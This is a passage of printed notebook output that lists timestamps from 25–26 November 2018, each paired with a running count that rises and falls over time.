"['2018-11-25 14:30:07.384237', 10]\n",
"['2018-11-25 14:31:26.833591', 9]\n",
"['2018-11-25 14:31:53.486417', 10]\n",
"['2018-11-25 14:32:26.104739', 11]\n",
"['2018-11-25 14:32:51.553384', 10]\n",
"['2018-11-25 14:33:11.278965', 9]\n",
"['2018-11-25 14:33:46.783357', 10]\n",
"['2018-11-25 14:34:03.670467', 11]\n",
"['2018-11-25 14:34:45.416321', 9]\n",
"['2018-11-25 14:34:45.513624', 10]\n",
"['2018-11-25 14:36:27.366660', 6]\n",
"['2018-11-25 14:36:47.485609', 7]\n",
"['2018-11-25 14:36:49.198520', 8]\n",
"['2018-11-25 14:36:51.737567', 9]\n",
"['2018-11-25 14:38:28.907457', 10]\n",
"['2018-11-25 14:39:16.909673', 7]\n",
"['2018-11-25 14:44:12.938501', 2]\n",
"['2018-11-25 14:50:49.059950', 3]\n",
"['2018-11-25 14:50:57.587750', 4]\n",
"['2018-11-25 14:51:29.422331', 5]\n",
"['2018-11-25 14:51:42.288227', 4]\n",
"['2018-11-25 14:51:49.973951', 5]\n",
"['2018-11-25 14:52:25.676992', 6]\n",
"['2018-11-25 14:52:30.332954', 7]\n",
"['2018-11-25 14:52:36.533451', 8]\n",
"['2018-11-25 14:53:00.320011', 9]\n",
"['2018-11-25 14:53:03.734208', 10]\n",
"['2018-11-25 14:53:18.282007', 11]\n",
"['2018-11-25 14:55:39.865383', 10]\n",
"['2018-11-25 14:57:34.986575', 8]\n",
"['2018-11-25 14:58:29.708403', 9]\n",
"['2018-11-25 14:58:33.435764', 10]\n",
"['2018-11-25 14:59:01.230180', 11]\n",
"['2018-11-25 14:59:46.530931', 12]\n",
"['2018-11-25 15:00:05.176841', 11]\n",
"['2018-11-25 15:00:10.152507', 9]\n",
"['2018-11-25 15:00:43.251233', 10]\n",
"['2018-11-25 15:02:00.734717', 11]\n",
"['2018-11-25 15:02:34.533131', 10]\n",
"['2018-11-25 15:02:50.102012', 11]\n",
"['2018-11-25 15:02:52.687356', 12]\n",
"['2018-11-25 15:02:56.035379', 13]\n",
"['2018-11-25 15:03:00.263944', 12]\n",
"['2018-11-25 15:03:03.610688', 11]\n",
"['2018-11-25 15:03:43.187127', 12]\n",
"['2018-11-25 15:03:48.718929', 11]\n",
"['2018-11-25 15:04:01.313433', 12]\n",
"['2018-11-25 15:06:21.499540', 13]\n",
"['2018-11-25 15:06:26.803845', 14]\n",
"['2018-11-25 15:06:52.930012', 13]\n",
"['2018-11-25 15:07:09.469329', 14]\n",
"['2018-11-25 15:07:31.824964', 11]\n",
"['2018-11-25 15:07:55.103110', 10]\n",
"['2018-11-25 15:07:58.804143', 11]\n",
"['2018-11-25 15:08:28.389805', 10]\n",
"['2018-11-25 15:08:37.354130', 11]\n",
"['2018-11-25 15:09:09.670688', 12]\n",
"['2018-11-25 15:09:23.171895', 13]\n",
"['2018-11-25 15:09:23.332590', 14]\n",
"['2018-11-25 15:09:52.663875', 15]\n",
"['2018-11-25 15:10:25.618024', 16]\n",
"['2018-11-25 15:10:27.919856', 17]\n",
"['2018-11-25 15:10:38.167089', 16]\n",
"['2018-11-25 15:10:59.952326', 17]\n",
"['2018-11-25 15:11:09.954437', 16]\n",
"['2018-11-25 15:11:52.679702', 17]\n",
"['2018-11-25 15:12:09.826265', 18]\n",
"['2018-11-25 15:12:16.702986', 17]\n",
"['2018-11-25 15:12:35.336772', 15]\n",
"['2018-11-25 15:12:38.259327', 14]\n",
"['2018-11-25 15:13:16.407202', 15]\n",
"['2018-11-25 15:13:40.415062', 14]\n",
"['2018-11-25 15:14:15.723438', 15]\n",
"['2018-11-25 15:14:38.336542', 14]\n",
"['2018-11-25 15:15:53.854137', 12]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 15:15:56.091172', 13]\n",
"['2018-11-25 15:16:13.358005', 12]\n",
"['2018-11-25 15:16:55.110871', 13]\n",
"['2018-11-25 15:18:06.938975', 12]\n",
"['2018-11-25 15:18:16.970893', 11]\n",
"['2018-11-25 15:18:26.927317', 10]\n",
"['2018-11-25 15:19:27.176936', 9]\n",
"['2018-11-25 15:19:58.716744', 8]\n",
"['2018-11-25 15:20:03.957883', 7]\n",
"['2018-11-25 15:20:08.998600', 6]\n",
"['2018-11-25 15:20:16.587280', 5]\n",
"['2018-11-25 15:20:29.609959', 6]\n",
"['2018-11-25 15:20:39.618268', 5]\n",
"['2018-11-25 15:20:55.718614', 4]\n",
"['2018-11-25 15:21:19.221791', 5]\n",
"['2018-11-25 15:21:57.123178', 6]\n",
"['2018-11-25 15:23:37.597545', 5]\n",
"['2018-11-25 15:24:08.441176', 6]\n",
"['2018-11-25 15:24:20.433962', 7]\n",
"['2018-11-25 15:25:19.913211', 6]\n",
"['2018-11-25 15:26:29.819910', 7]\n",
"['2018-11-25 15:26:39.984176', 6]\n",
"['2018-11-25 15:27:02.518813', 7]\n",
"['2018-11-25 15:27:06.773893', 8]\n",
"['2018-11-25 15:28:20.544902', 7]\n",
"['2018-11-25 15:29:41.999791', 6]\n",
"['2018-11-25 15:30:27.607201', 7]\n",
"['2018-11-25 15:30:31.247545', 6]\n",
"['2018-11-25 15:31:11.987621', 4]\n",
"['2018-11-25 15:32:02.876524', 5]\n",
"['2018-11-25 15:32:32.052999', 4]\n",
"['2018-11-25 15:33:00.061633', 5]\n",
"['2018-11-25 15:33:41.271251', 6]\n",
"['2018-11-25 15:36:59.678102', 4]\n",
"['2018-11-25 15:37:03.067495', 3]\n",
"['2018-11-25 15:37:05.809917', 4]\n",
"['2018-11-25 15:37:17.222938', 5]\n",
"['2018-11-25 15:37:17.226141', 6]\n",
"['2018-11-25 15:38:58.569760', 4]\n",
"['2018-11-25 15:39:59.735197', 5]\n",
"['2018-11-25 15:40:27.470764', 6]\n",
"['2018-11-25 15:41:17.542235', 5]\n",
"['2018-11-25 15:41:57.563742', 4]\n",
"['2018-11-25 15:43:00.925387', 3]\n",
"['2018-11-25 15:43:37.786807', 4]\n",
"['2018-11-25 15:46:52.734304', 5]\n",
"['2018-11-25 15:46:54.335968', 6]\n",
"['2018-11-25 15:48:27.499059', 7]\n",
"['2018-11-25 15:51:00.592939', 8]\n",
"['2018-11-25 15:51:39.891717', 7]\n",
"['2018-11-25 15:51:46.089905', 8]\n",
"['2018-11-25 15:52:30.988977', 7]\n",
"['2018-11-25 15:53:28.967146', 8]\n",
"['2018-11-25 15:53:53.933552', 9]\n",
"['2018-11-25 15:56:13.918359', 10]\n",
"['2018-11-25 15:56:24.629284', 11]\n",
"['2018-11-25 15:56:28.606639', 12]\n",
"['2018-11-25 15:57:26.209818', 13]\n",
"['2018-11-25 15:57:37.407740', 14]\n",
"['2018-11-25 15:58:03.445372', 13]\n",
"['2018-11-25 15:58:22.503139', 12]\n",
"['2018-11-25 16:00:21.444935', 13]\n",
"['2018-11-25 16:00:29.024359', 12]\n",
"['2018-11-25 16:00:38.242289', 13]\n",
"['2018-11-25 16:01:11.197906', 11]\n",
"['2018-11-25 16:01:11.817947', 12]\n",
"['2018-11-25 16:01:28.782471', 10]\n",
"['2018-11-25 16:02:13.778025', 8]\n",
"['2018-11-25 16:02:38.933574', 7]\n",
"['2018-11-25 16:03:02.921459', 8]\n",
"['2018-11-25 16:03:08.263408', 9]\n",
"['2018-11-25 16:04:16.212905', 10]\n",
"['2018-11-25 16:04:28.999509', 11]\n",
"['2018-11-25 16:04:44.774517', 10]\n",
"['2018-11-25 16:05:26.842546', 9]\n",
"['2018-11-25 16:06:16.855839', 10]\n",
"['2018-11-25 16:06:26.610875', 11]\n",
"['2018-11-25 16:07:27.598391', 9]\n",
"['2018-11-25 16:07:37.767404', 10]\n",
"['2018-11-25 16:07:44.273967', 11]\n",
"['2018-11-25 16:08:29.016146', 10]\n",
"['2018-11-25 16:09:52.007970', 11]\n",
"['2018-11-25 16:09:53.643728', 12]\n",
"['2018-11-25 16:09:55.066625', 13]\n",
"['2018-11-25 16:10:43.026715', 12]\n",
"['2018-11-25 16:10:45.021489', 11]\n",
"['2018-11-25 16:11:30.359477', 10]\n",
"['2018-11-25 16:11:34.425954', 11]\n",
"['2018-11-25 16:12:25.828601', 10]\n",
"['2018-11-25 16:12:34.196546', 9]\n",
"['2018-11-25 16:12:35.118326', 8]\n",
"['2018-11-25 16:12:48.434946', 9]\n",
"['2018-11-25 16:13:21.248517', 10]\n",
"['2018-11-25 16:13:32.710778', 11]\n",
"['2018-11-25 16:13:59.175619', 10]\n",
"['2018-11-25 16:14:18.094376', 9]\n",
"['2018-11-25 16:14:27.287540', 7]\n",
"['2018-11-25 16:16:02.371849', 6]\n",
"['2018-11-25 16:16:59.701954', 5]\n",
"['2018-11-25 16:19:17.689817', 6]\n",
"['2018-11-25 16:20:58.979959', 5]\n",
"['2018-11-25 16:22:25.135894', 4]\n",
"['2018-11-25 16:23:23.765534', 3]\n",
"['2018-11-25 16:23:24.155209', 4]\n",
"['2018-11-25 16:23:37.639315', 3]\n",
"['2018-11-25 16:23:39.841346', 4]\n",
"['2018-11-25 16:26:46.151913', 3]\n",
"['2018-11-25 16:28:08.963842', 1]\n",
"['2018-11-25 16:35:10.108178', 2]\n",
"['2018-11-25 16:43:27.066335', 1]\n",
"['2018-11-25 16:44:27.675009', 2]\n",
"['2018-11-25 16:50:36.247199', 3]\n",
"['2018-11-25 16:51:39.963889', 4]\n",
"['2018-11-25 16:52:00.472855', 5]\n",
"['2018-11-25 16:52:50.660013', 6]\n",
"['2018-11-25 16:53:56.511801', 7]\n",
"['2018-11-25 16:53:58.139738', 8]\n",
"['2018-11-25 16:54:00.779971', 9]\n",
"['2018-11-25 16:55:50.344209', 8]\n",
"['2018-11-25 16:56:59.405894', 9]\n",
"['2018-11-25 16:57:31.012140', 10]\n",
"['2018-11-25 16:57:43.467061', 11]\n",
"['2018-11-25 16:58:02.702863', 10]\n",
"['2018-11-25 16:58:10.707999', 9]\n",
"['2018-11-25 16:59:01.699512', 10]\n",
"['2018-11-25 16:59:46.351205', 11]\n",
"['2018-11-25 17:00:01.820595', 10]\n",
"['2018-11-25 17:00:58.635350', 9]\n",
"['2018-11-25 17:01:43.627891', 8]\n",
"['2018-11-25 17:01:57.802636', 9]\n",
"['2018-11-25 17:03:10.528779', 8]\n",
"['2018-11-25 17:03:44.020020', 9]\n",
"['2018-11-25 17:05:27.316713', 8]\n",
"['2018-11-25 17:06:11.921618', 6]\n",
"['2018-11-25 17:06:55.584892', 7]\n",
"['2018-11-25 17:08:28.559527', 5]\n",
"['2018-11-25 17:09:58.544829', 4]\n",
"['2018-11-25 17:10:25.871967', 5]\n",
"['2018-11-25 17:10:38.052635', 6]\n",
"['2018-11-25 17:11:28.529155', 4]\n",
"['2018-11-25 17:12:28.994795', 3]\n",
"['2018-11-25 17:14:30.164014', 2]\n",
"['2018-11-25 17:15:00.529649', 3]\n",
"['2018-11-25 17:15:26.090640', 4]\n",
"['2018-11-25 17:15:33.652454', 3]\n",
"['2018-11-25 17:16:06.818502', 4]\n",
"['2018-11-25 17:18:51.647058', 3]\n",
"['2018-11-25 17:26:10.768997', 1]\n",
"['2018-11-25 17:27:07.299281', 2]\n",
"['2018-11-25 17:27:07.303435', 3]\n",
"['2018-11-25 17:28:25.791512', 4]\n",
"['2018-11-25 17:30:14.096382', 3]\n",
"['2018-11-25 17:44:00.406806', 1]\n",
"['2018-11-25 17:46:03.818789', 2]\n",
"['2018-11-25 17:50:24.409393', 3]\n",
"['2018-11-25 17:50:36.240190', 4]\n",
"['2018-11-25 17:54:40.613768', 2]\n",
"['2018-11-25 17:56:48.709010', 1]\n",
"['2018-11-25 17:57:20.233877', 2]\n",
"['2018-11-25 17:58:16.144133', 3]\n",
"['2018-11-25 17:58:18.740188', 4]\n",
"['2018-11-25 17:59:32.008201', 5]\n",
"['2018-11-25 18:00:23.986051', 6]\n",
"['2018-11-25 18:00:32.662687', 7]\n",
"['2018-11-25 18:02:36.381708', 6]\n",
"['2018-11-25 18:04:04.192299', 7]\n",
"['2018-11-25 18:04:32.857529', 6]\n",
"['2018-11-25 18:04:35.116662', 5]\n",
"['2018-11-25 18:04:47.291180', 4]\n",
"['2018-11-25 18:05:05.641466', 3]\n",
"['2018-11-25 18:05:10.486677', 4]\n",
"['2018-11-25 18:05:24.469046', 5]\n",
"['2018-11-25 18:06:08.956791', 6]\n",
"['2018-11-25 18:06:33.792925', 7]\n",
"['2018-11-25 18:06:50.879535', 8]\n",
"['2018-11-25 18:07:20.084122', 9]\n",
"['2018-11-25 18:10:45.276195', 7]\n",
"['2018-11-25 18:11:11.946407', 6]\n",
"['2018-11-25 18:11:31.946997', 5]\n",
"['2018-11-25 18:13:07.487004', 4]\n",
"['2018-11-25 18:13:09.125093', 5]\n",
"['2018-11-25 18:13:11.749522', 6]\n",
"['2018-11-25 18:13:15.096080', 7]\n",
"['2018-11-25 18:14:14.281891', 8]\n",
"['2018-11-25 18:14:34.233000', 9]\n",
"['2018-11-25 18:15:18.300198', 10]\n",
"['2018-11-25 18:15:28.825254', 11]\n",
"['2018-11-25 18:15:37.987978', 10]\n",
"['2018-11-25 18:15:47.137564', 9]\n",
"['2018-11-25 18:16:02.086093', 10]\n",
"['2018-11-25 18:18:06.264144', 6]\n",
"['2018-11-25 18:19:07.867012', 5]\n",
"['2018-11-25 18:20:41.352127', 2]\n",
"['2018-11-25 18:29:25.426306', 1]\n",
"['2018-11-25 18:29:33.378984', 2]\n",
"['2018-11-25 18:29:34.398916', 3]\n",
"['2018-11-25 18:34:33.695576', 1]\n",
"['2018-11-25 18:41:47.968679', 2]\n",
"['2018-11-25 18:42:48.127163', 3]\n",
"['2018-11-25 18:43:14.105249', 4]\n",
"['2018-11-25 18:43:52.538371', 5]\n",
"['2018-11-25 18:44:03.230773', 6]\n",
"['2018-11-25 18:44:05.598792', 7]\n",
"['2018-11-25 18:44:58.137186', 8]\n",
"['2018-11-25 18:45:21.008578', 9]\n",
"['2018-11-25 18:45:49.322199', 8]\n",
"['2018-11-25 18:47:12.487142', 7]\n",
"['2018-11-25 18:47:21.974659', 8]\n",
"['2018-11-25 18:48:06.985094', 7]\n",
"['2018-11-25 18:49:21.552027', 8]\n",
"['2018-11-25 18:50:52.055319', 7]\n",
"['2018-11-25 18:52:05.956030', 8]\n",
"['2018-11-25 18:53:28.938496', 9]\n",
"['2018-11-25 18:53:32.305484', 10]\n",
"['2018-11-25 18:53:41.458661', 11]\n",
"['2018-11-25 18:54:19.476815', 12]\n",
"['2018-11-25 18:56:15.128954', 11]\n",
"['2018-11-25 18:57:33.107177', 12]\n",
"['2018-11-25 18:57:50.028163', 10]\n",
"['2018-11-25 18:58:00.038280', 9]\n",
"['2018-11-25 18:59:02.689764', 10]\n",
"['2018-11-25 18:59:16.308802', 9]\n",
"['2018-11-25 19:00:40.188590', 8]\n",
"['2018-11-25 19:01:10.930322', 9]\n",
"['2018-11-25 19:01:20.218781', 8]\n",
"['2018-11-25 19:01:33.182384', 9]\n",
"['2018-11-25 19:01:37.832592', 8]\n",
"['2018-11-25 19:01:49.070708', 9]\n",
"['2018-11-25 19:03:20.348766', 8]\n",
"['2018-11-25 19:04:16.731758', 9]\n",
"['2018-11-25 19:05:27.516017', 8]\n",
"['2018-11-25 19:05:46.045992', 6]\n",
"['2018-11-25 19:06:58.917170', 5]\n",
"['2018-11-25 19:07:31.405925', 4]\n",
"['2018-11-25 19:07:36.329917', 5]\n",
"['2018-11-25 19:07:57.428662', 6]\n",
"['2018-11-25 19:08:06.595627', 7]\n",
"['2018-11-25 19:08:31.782159', 8]\n",
"['2018-11-25 19:08:33.336311', 9]\n",
"['2018-11-25 19:08:34.312723', 10]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-25 19:08:34.567248', 11]\n",
"['2018-11-25 19:08:40.638682', 10]\n",
"['2018-11-25 19:08:59.280867', 11]\n",
"['2018-11-25 19:09:20.699380', 12]\n",
"['2018-11-25 19:11:30.995011', 11]\n",
"['2018-11-25 19:12:09.836429', 10]\n",
"['2018-11-25 19:12:36.820339', 9]\n",
"['2018-11-25 19:12:49.866604', 8]\n",
"['2018-11-25 19:15:39.961039', 7]\n",
"['2018-11-25 19:17:50.736062', 6]\n",
"['2018-11-25 19:18:03.606197', 7]\n",
"['2018-11-25 19:18:10.745448', 6]\n",
"['2018-11-25 19:19:00.766940', 5]\n",
"['2018-11-25 19:19:40.807901', 4]\n",
"['2018-11-25 19:20:52.693609', 5]\n",
"['2018-11-25 19:21:18.264846', 6]\n",
"['2018-11-25 19:21:41.872088', 7]\n",
"['2018-11-25 19:22:08.875308', 8]\n",
"['2018-11-25 19:22:20.925491', 7]\n",
"['2018-11-25 19:24:31.016645', 6]\n",
"['2018-11-25 19:26:26.628356', 5]\n",
"['2018-11-25 19:26:31.095817', 4]\n",
"['2018-11-25 19:26:51.116389', 3]\n",
"['2018-11-25 19:27:11.118273', 2]\n",
"['2018-11-25 19:28:03.317381', 3]\n",
"['2018-11-25 19:28:46.096639', 4]\n",
"['2018-11-25 19:29:00.912522', 5]\n",
"['2018-11-25 19:29:00.916646', 6]\n",
"['2018-11-25 19:30:14.158145', 7]\n",
"['2018-11-25 19:31:43.247711', 6]\n",
"['2018-11-25 19:33:08.227963', 5]\n",
"['2018-11-25 19:35:11.289931', 4]\n",
"['2018-11-25 19:39:40.203402', 1]\n",
"['2018-11-25 19:45:27.883057', 2]\n",
"['2018-11-25 19:46:12.645316', 3]\n",
"['2018-11-25 19:46:26.065684', 4]\n",
"['2018-11-25 19:49:48.444240', 3]\n",
"['2018-11-25 19:50:42.600375', 2]\n",
"['2018-11-25 19:53:38.392910', 3]\n",
"['2018-11-25 19:54:15.742957', 4]\n",
"['2018-11-25 19:54:30.774062', 5]\n",
"['2018-11-25 19:54:58.280194', 6]\n",
"['2018-11-25 19:55:02.209950', 7]\n",
"['2018-11-25 19:57:32.339295', 8]\n",
"['2018-11-25 19:58:02.437363', 6]\n",
"['2018-11-25 19:59:01.234921', 5]\n",
"['2018-11-25 19:59:42.495338', 4]\n",
"['2018-11-25 20:01:57.473201', 3]\n",
"['2018-11-25 20:05:56.530321', 4]\n",
"['2018-11-25 20:07:16.827969', 3]\n",
"['2018-11-25 20:07:31.212124', 4]\n",
"['2018-11-25 20:10:06.761832', 3]\n",
"['2018-11-25 20:17:15.484897', 1]\n",
"['2018-11-25 20:18:08.793401', 2]\n",
"['2018-11-26 04:50:28.510707', 1]\n",
"['2018-11-26 05:08:00.228086', 2]\n",
"['2018-11-26 05:08:59.340824', 3]\n",
"['2018-11-26 05:09:32.286176', 4]\n",
"['2018-11-26 05:12:12.563480', 5]\n",
"['2018-11-26 05:12:20.584585', 6]\n",
"['2018-11-26 05:14:06.742477', 5]\n",
"['2018-11-26 05:16:03.049372', 3]\n",
"['2018-11-26 05:17:38.888473', 2]\n",
"['2018-11-26 05:22:49.697577', 1]\n",
"['2018-11-26 05:25:01.053782', 2]\n",
"['2018-11-26 05:25:01.883692', 3]\n",
"['2018-11-26 05:26:01.818028', 4]\n",
"['2018-11-26 05:26:51.773045', 3]\n",
"['2018-11-26 05:27:58.962100', 4]\n",
"['2018-11-26 05:28:13.291940', 5]\n",
"['2018-11-26 05:30:44.409796', 4]\n",
"['2018-11-26 05:32:41.399009', 2]\n",
"['2018-11-26 05:35:56.300285', 3]\n",
"['2018-11-26 05:41:41.946496', 2]\n",
"['2018-11-26 06:00:34.266439', 1]\n",
"['2018-11-26 06:01:52.917100', 2]\n",
"['2018-11-26 06:03:59.076457', 3]\n",
"['2018-11-26 06:06:51.271213', 4]\n",
"['2018-11-26 06:09:59.906509', 2]\n",
"['2018-11-26 06:11:58.076326', 3]\n",
"['2018-11-26 06:12:57.614964', 4]\n",
"['2018-11-26 06:14:01.823293', 3]\n",
"['2018-11-26 06:16:04.576673', 2]\n",
"['2018-11-26 06:16:21.311337', 3]\n",
"['2018-11-26 06:18:14.367876', 2]\n",
"['2018-11-26 06:28:46.602603', 3]\n",
"['2018-11-26 06:29:21.563172', 4]\n",
"['2018-11-26 06:30:39.588972', 5]\n",
"['2018-11-26 06:31:46.179105', 6]\n",
"['2018-11-26 06:31:54.923416', 7]\n",
"['2018-11-26 06:31:54.927565', 8]\n",
"['2018-11-26 06:32:05.512879', 9]\n",
"['2018-11-26 06:33:23.105912', 8]\n",
"['2018-11-26 06:34:39.206059', 9]\n",
"['2018-11-26 06:34:55.625057', 10]\n",
"['2018-11-26 06:35:12.625235', 8]\n",
"['2018-11-26 06:36:51.448103', 7]\n",
"['2018-11-26 06:37:30.639758', 8]\n",
"['2018-11-26 06:38:03.919334', 9]\n",
"['2018-11-26 06:41:07.530623', 10]\n",
"['2018-11-26 06:41:09.685073', 11]\n",
"['2018-11-26 06:41:47.423843', 12]\n",
"['2018-11-26 06:42:24.859441', 13]\n",
"['2018-11-26 06:43:44.710416', 12]\n",
"['2018-11-26 06:44:39.150268', 11]\n",
"['2018-11-26 06:44:58.559256', 10]\n",
"['2018-11-26 06:45:25.797331', 8]\n",
"['2018-11-26 06:45:55.923595', 9]\n",
"['2018-11-26 06:47:11.022400', 8]\n",
"['2018-11-26 06:47:31.844249', 9]\n",
"['2018-11-26 06:48:29.024431', 10]\n",
"['2018-11-26 06:49:56.154315', 9]\n",
"['2018-11-26 06:50:04.867873', 10]\n",
"['2018-11-26 06:51:34.814859', 11]\n",
"['2018-11-26 06:51:56.193522', 10]\n",
"['2018-11-26 06:52:37.415791', 11]\n",
"['2018-11-26 06:53:29.149202', 12]\n",
"['2018-11-26 06:54:51.399145', 11]\n",
"['2018-11-26 06:55:08.254358', 10]\n",
"['2018-11-26 06:56:07.341188', 11]\n",
"['2018-11-26 06:56:31.717535', 10]\n",
"['2018-11-26 06:56:40.006257', 11]\n",
"['2018-11-26 06:58:10.698453', 10]\n",
"['2018-11-26 06:58:37.204297', 9]\n",
"['2018-11-26 06:58:45.649526', 8]\n",
"['2018-11-26 06:59:39.438497', 9]\n",
"['2018-11-26 06:59:39.580422', 10]\n",
"['2018-11-26 06:59:44.577463', 11]\n",
"['2018-11-26 06:59:59.642382', 12]\n",
"['2018-11-26 07:00:00.589585', 13]\n",
"['2018-11-26 07:00:09.583553', 12]\n",
"['2018-11-26 07:00:17.171225', 11]\n",
"['2018-11-26 07:00:43.057019', 10]\n",
"['2018-11-26 07:00:59.105853', 11]\n",
"['2018-11-26 07:02:10.038546', 12]\n",
"['2018-11-26 07:03:41.457046', 11]\n",
"['2018-11-26 07:04:54.528966', 7]\n",
"['2018-11-26 07:05:16.357422', 4]\n",
"['2018-11-26 07:05:22.069695', 5]\n",
"['2018-11-26 07:05:49.412819', 6]\n",
"['2018-11-26 07:06:11.026932', 7]\n",
"['2018-11-26 07:08:42.455784', 6]\n",
"['2018-11-26 07:09:22.549983', 5]\n",
"['2018-11-26 07:10:12.580886', 3]\n",
"['2018-11-26 07:12:10.437551', 4]\n",
"['2018-11-26 07:13:01.688459', 5]\n",
"['2018-11-26 07:13:20.324105', 6]\n",
"['2018-11-26 07:14:08.173207', 7]\n",
"['2018-11-26 07:15:36.834150', 8]\n",
"['2018-11-26 07:18:36.876494', 7]\n",
"['2018-11-26 07:19:27.648754', 6]\n",
"['2018-11-26 07:21:29.665217', 5]\n",
"['2018-11-26 07:23:40.425282', 1]\n",
"['2018-11-26 07:29:57.220558', 2]\n",
"['2018-11-26 07:30:34.760751', 3]\n",
"['2018-11-26 07:33:59.421474', 2]\n",
"['2018-11-26 07:34:57.598289', 3]\n",
"['2018-11-26 07:38:34.547478', 4]\n",
"['2018-11-26 07:39:56.495461', 5]\n",
"['2018-11-26 07:40:32.324376', 6]\n",
"['2018-11-26 07:42:04.838420', 7]\n",
"['2018-11-26 07:43:14.741624', 8]\n",
"['2018-11-26 07:44:35.987779', 6]\n",
"['2018-11-26 07:44:47.405366', 7]\n",
"['2018-11-26 07:44:58.559619', 8]\n",
"['2018-11-26 07:45:34.675092', 9]\n",
"['2018-11-26 07:46:04.843777', 8]\n",
"['2018-11-26 07:46:39.504913', 9]\n",
"['2018-11-26 07:46:55.844936', 10]\n",
"['2018-11-26 07:48:41.561708', 11]\n",
"['2018-11-26 07:48:50.543557', 12]\n",
"['2018-11-26 07:48:55.368301', 13]\n",
"['2018-11-26 07:50:06.654364', 14]\n",
"['2018-11-26 07:50:08.647512', 15]\n",
"['2018-11-26 07:50:24.979396', 16]\n",
"['2018-11-26 07:50:34.668904', 17]\n",
"['2018-11-26 07:51:01.195313', 18]\n",
"['2018-11-26 07:51:07.725222', 19]\n",
"['2018-11-26 07:51:19.188813', 20]\n",
"['2018-11-26 07:51:43.308681', 19]\n",
"['2018-11-26 07:52:53.608258', 18]\n",
"['2018-11-26 07:53:11.189149', 17]\n",
"['2018-11-26 07:53:25.563016', 16]\n",
"['2018-11-26 07:53:39.574292', 17]\n",
"['2018-11-26 07:54:07.170026', 16]\n",
"['2018-11-26 07:54:21.434893', 17]\n",
"['2018-11-26 07:54:28.974068', 18]\n",
"['2018-11-26 07:54:33.728680', 19]\n",
"['2018-11-26 07:54:36.593102', 18]\n",
"['2018-11-26 07:55:04.334452', 19]\n",
"['2018-11-26 07:55:34.688214', 20]\n",
"['2018-11-26 07:55:52.424176', 21]\n",
"['2018-11-26 07:55:54.035149', 22]\n",
"['2018-11-26 07:56:08.022810', 23]\n",
"['2018-11-26 07:57:52.324339', 22]\n",
"['2018-11-26 07:58:00.439240', 23]\n",
"['2018-11-26 07:58:03.884818', 24]\n",
"['2018-11-26 07:58:15.603593', 25]\n",
"['2018-11-26 07:58:25.939236', 24]\n",
"['2018-11-26 07:58:29.355496', 25]\n",
"['2018-11-26 07:58:34.824878', 23]\n",
"['2018-11-26 07:58:59.579708', 21]\n",
"['2018-11-26 07:59:04.363174', 20]\n",
"['2018-11-26 07:59:29.371621', 19]\n",
"['2018-11-26 07:59:35.386908', 18]\n",
"['2018-11-26 07:59:53.743244', 19]\n",
"['2018-11-26 07:59:58.812186', 17]\n",
"['2018-11-26 08:00:35.496123', 18]\n",
"['2018-11-26 08:00:49.891471', 19]\n",
"['2018-11-26 08:00:52.550967', 18]\n",
"['2018-11-26 08:01:02.589213', 17]\n",
"['2018-11-26 08:01:15.983885', 16]\n",
"['2018-11-26 08:01:55.789549', 14]\n",
"['2018-11-26 08:02:10.578743', 15]\n",
"['2018-11-26 08:02:16.470848', 16]\n",
"['2018-11-26 08:02:31.330772', 15]\n",
"['2018-11-26 08:03:00.696409', 14]\n",
"['2018-11-26 08:03:06.039473', 15]\n",
"['2018-11-26 08:04:27.426715', 14]\n",
"['2018-11-26 08:05:00.197848', 15]\n",
"['2018-11-26 08:05:30.240127', 14]\n",
"['2018-11-26 08:05:57.195430', 13]\n",
"['2018-11-26 08:06:29.157135', 11]\n",
"['2018-11-26 08:06:34.747068', 10]\n",
"['2018-11-26 08:07:58.997270', 8]\n",
"['2018-11-26 08:08:10.536341', 9]\n",
"['2018-11-26 08:08:15.853583', 10]\n",
"['2018-11-26 08:08:59.963522', 9]\n",
"['2018-11-26 08:09:10.718691', 10]\n",
"['2018-11-26 08:09:20.996446', 9]\n",
"['2018-11-26 08:10:00.988304', 8]\n",
"['2018-11-26 08:10:10.258359', 9]\n",
"['2018-11-26 08:12:14.179129', 8]\n",
"['2018-11-26 08:14:05.458506', 7]\n",
"['2018-11-26 08:16:43.771354', 8]\n",
"['2018-11-26 08:17:38.178343', 7]\n",
"['2018-11-26 08:18:11.379405', 6]\n",
"['2018-11-26 08:19:15.965539', 5]\n",
"['2018-11-26 08:20:02.054528', 4]\n",
"['2018-11-26 08:20:25.256436', 3]\n",
"['2018-11-26 08:22:57.055641', 4]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-26 08:30:26.279142', 1]\n",
"['2018-11-26 08:34:24.964470', 2]\n",
"['2018-11-26 08:34:38.641310', 3]\n",
"['2018-11-26 08:35:40.159978', 4]\n",
"['2018-11-26 08:38:41.864900', 3]\n",
"['2018-11-26 08:38:51.871045', 2]\n",
"['2018-11-26 08:38:57.636732', 3]\n",
"['2018-11-26 08:39:48.974892', 4]\n",
"['2018-11-26 08:41:12.011647', 3]\n",
"['2018-11-26 08:41:47.185870', 4]\n",
"['2018-11-26 08:44:00.296508', 5]\n",
"['2018-11-26 08:44:05.375912', 6]\n",
"['2018-11-26 08:44:11.216718', 7]\n",
"['2018-11-26 08:44:44.457905', 8]\n",
"['2018-11-26 08:45:36.044150', 9]\n",
"['2018-11-26 08:46:02.272714', 8]\n",
"['2018-11-26 08:48:42.423310', 7]\n",
"['2018-11-26 08:48:42.866785', 8]\n",
"['2018-11-26 08:49:06.814098', 9]\n",
"['2018-11-26 08:50:00.401865', 10]\n",
"['2018-11-26 08:50:04.462650', 9]\n",
"['2018-11-26 08:51:13.341229', 8]\n",
"['2018-11-26 08:52:13.610296', 7]\n",
"['2018-11-26 08:52:16.228344', 8]\n",
"['2018-11-26 08:52:16.414267', 9]\n",
"['2018-11-26 08:52:24.121178', 10]\n",
"['2018-11-26 08:53:38.861151', 11]\n",
"['2018-11-26 08:53:40.120410', 12]\n",
"['2018-11-26 08:53:59.277363', 10]\n",
"['2018-11-26 08:54:01.215039', 11]\n",
"['2018-11-26 08:55:39.935649', 10]\n",
"['2018-11-26 08:57:34.688788', 11]\n",
"['2018-11-26 08:57:45.561136', 8]\n",
"['2018-11-26 08:58:14.296038', 6]\n",
"['2018-11-26 08:58:25.330113', 7]\n",
"['2018-11-26 08:58:29.092646', 8]\n",
"['2018-11-26 08:58:39.551740', 9]\n",
"['2018-11-26 08:59:15.384307', 8]\n",
"['2018-11-26 08:59:20.656292', 9]\n",
"['2018-11-26 08:59:40.726808', 7]\n",
